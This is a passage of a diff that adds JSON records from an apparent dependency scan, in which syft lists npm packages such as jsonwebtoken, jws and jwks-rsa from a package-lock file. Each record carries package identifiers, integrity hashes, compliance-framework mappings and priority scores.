+ "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4db17fad932f2d8e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: js-md5 0.8.3", + "title": "js-md5 0.8.3", + "description": "Package discovered: js-md5 0.8.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d30adc61a99cb3ed", + "name": "js-md5", + "version": "0.8.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/js-md5@0.8.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz", + "integrity": "sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "88f0214bae1b08f0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: js-tokens 4.0.0", + "title": "js-tokens 4.0.0", + "description": "Package discovered: js-tokens 4.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "132a500346fcea0c", + "name": "js-tokens", + "version": "4.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/js-tokens@4.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d7056e806f2cd1e3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: json-bigint 1.0.0", + "title": "json-bigint 1.0.0", + "description": "Package discovered: json-bigint 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f29c1976ad3d8cb0", + "name": "json-bigint", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/json-bigint@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz", + "integrity": "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==", + "dependencies": { + "bignumber.js": "^9.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2a5374383b13cd28", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jsonwebtoken 9.0.3", + "title": "jsonwebtoken 9.0.3", + "description": "Package discovered: jsonwebtoken 9.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2ebcc52db7d200cb", + "name": "jsonwebtoken", + "version": "9.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/jsonwebtoken@9.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz", + "integrity": "sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==", + "dependencies": { + "jws": "^4.0.1", + "lodash.includes": "^4.3.0", + "lodash.isboolean": "^3.0.3", + "lodash.isinteger": "^4.0.4", + "lodash.isnumber": "^3.0.3", + "lodash.isplainobject": "^4.0.6", + "lodash.isstring": "^4.0.1", + "lodash.once": "^4.0.0", + "ms": "^2.1.1", + "semver": "^7.5.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "835e252fefb47867", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jwa 2.0.1", + "title": "jwa 2.0.1", + "description": "Package discovered: jwa 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "154697ca4fb19b8b", + "name": "jwa", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jwa@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz", + "integrity": "sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==", + "dependencies": { + "buffer-equal-constant-time": "^1.0.1", + "ecdsa-sig-formatter": "1.0.11", + "safe-buffer": "^5.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0c0a903cc4471d02", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jwks-rsa 3.2.2", + "title": "jwks-rsa 3.2.2", + "description": "Package discovered: jwks-rsa 3.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "014369d0efdc09b2", + "name": "jwks-rsa", + "version": "3.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jwks-rsa@3.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz", + "integrity": "sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w==", + "dependencies": { + "@types/jsonwebtoken": "^9.0.4", + "debug": "^4.3.4", + "jose": "^4.15.4", + "limiter": "^1.1.5", + "lru-memoizer": "^2.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5dd04dd82934e4bc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jws 4.0.1", + "title": "jws 4.0.1", + "description": "Package discovered: jws 4.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7fed8e7a1bc916bb", + "name": "jws", + "version": "4.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jws@4.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jws/-/jws-4.0.1.tgz", + "integrity": "sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==", + "dependencies": { + "jwa": "^2.0.1", + "safe-buffer": "^5.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fdd5e753a1967298", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: leac 0.6.0", + "title": "leac 0.6.0", + "description": "Package discovered: leac 0.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9ec1624bf944fe34", + "name": "leac", + "version": "0.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/leac@0.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/leac/-/leac-0.6.0.tgz", + "integrity": "sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "63788a24cb56472a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lilconfig 3.1.3", + "title": "lilconfig 3.1.3", + "description": "Package discovered: lilconfig 3.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a8f0bd77b399e569", + "name": "lilconfig", + "version": "3.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": 